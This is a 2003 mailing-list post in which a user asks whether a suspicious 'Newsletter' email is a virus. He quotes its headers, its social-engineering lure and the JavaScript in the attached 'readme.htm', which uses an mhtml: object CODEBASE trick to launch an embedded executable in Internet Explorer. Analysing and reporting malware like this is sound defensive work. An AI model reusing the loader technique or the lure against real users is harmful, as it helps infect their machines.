Is this a new virus ?
From: Walter Dnes (waltdnes_at_waltdnes.org)
Date: 07/27/03
- Next message: The Other Guy: "[NEWS] Hacker code could unleash Windows worm"
- Previous message: Reticulum: "Please Help with WINCFG.SCR Infection !"
- Next in thread: John Elsbury: "Re: Is this a new virus ?"
- Reply: John Elsbury: "Re: Is this a new virus ?"
- Reply: Dave Korn: "Re: Is this a new virus ?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 27 Jul 2003 17:17:43 GMT
I got the following in my inbox today. I've notified the abuse people at
swbell.net. Since I use linux on my home machine, I did some poking
around without fear. The headers and text portion of the message was...
> Received: from adsl-68-78-121-83.dsl.emhril.ameritech.net (HELO compuserve.com) (68.78.121.83)
> by manson.clss.net with SMTP;
> Fri, 25 Jul 2003 22:00:19 -0500
> Date: Sat, 26 Jul 2003 12:02:37 +0000
> From: Admin <admin@security.org>
> Subject: Newsletter
> To: Waltdnes <waltdnes@waltdnes.org>
> References: <6KAF6GEDBJLD9D31@waltdnes.org>
> In-Reply-To: <6KAF6GEDBJLD9D31@waltdnes.org>
> Message-ID: <LJ6L969A05305AB9@security.org>
> Reply-To: Admin <admin@security.org>
> Sender: Admin <admin@security.org>
> MIME-Version: 1.0
> Content-Type: multipart/mixed;
> +boundary="----=_NextPart_03CHDD7_H7_0B0F9F17L3EL45"
>
> [-- Attachment #1 --]
> [-- Type: text/plain, Encoding: 8bit, Size: 0.2K --]
> Content-Type: text/plain; charset=Windows-1251
> Content-Transfer-Encoding: 8bit
>
> Hello , waltdnes@waltdnes.org
>
>
> New windows bug was detected , details in readme.htm file (attached) !
>
> This is not spam ! , you get this letter because you are member of
> +www.security.org
>
> [-- Attachment #2: readme.zip --]
> [-- Type: text/plain, Encoding: base64, Size: 1.6K --]
> Content-Type: text/plain; name="readme.zip"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="readme.zip"
> Content-ID: <readme.zip>
They weren't kidding about "details in readme.htm file" either. I
unzipped it and the so-called "readme.htm" file began with...
> MIME-Version: 1.0
> Content-Location:file:///aaa.exe
> Content-Transfer-Encoding: base64
>
> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAA
[...snip rest of EXE...] Yes folks, an executable file. This was
followed by some funky javascript...
<body bgcolor=black scroll=no><script>
function f()
{s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));path=unescape(path);
document.write('<center><font color=red size=+5>Please wait loading
message ..... <body scroll=no bgcolor=black><object
classid="clsid:11111111-1111-1111-1111"
CODEBASE="mhtml:'+path+'\\readme.htm!file:///aaa.exe"></object>')}
setTimeout('f()',3000)</script>
I don't claim to understand javascript or Windows. Am I reading this
properly ? Opening "readme.htm" with IE will launch an EXE file ???
Since this is all done locally, I assume that what passes for "internet
security" on Windows won't be invoked, and the program will have the
full privileges of the user.
-- Walter Dnes <waltdnes@waltdnes.org> Email users are divided into two classes; 1) Those who have effective spam-blocking 2) Those who wish they did
- Next message: The Other Guy: "[NEWS] Hacker code could unleash Windows worm"
- Previous message: Reticulum: "Please Help with WINCFG.SCR Infection !"
- Next in thread: John Elsbury: "Re: Is this a new virus ?"
- Reply: John Elsbury: "Re: Is this a new virus ?"
- Reply: Dave Korn: "Re: Is this a new virus ?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
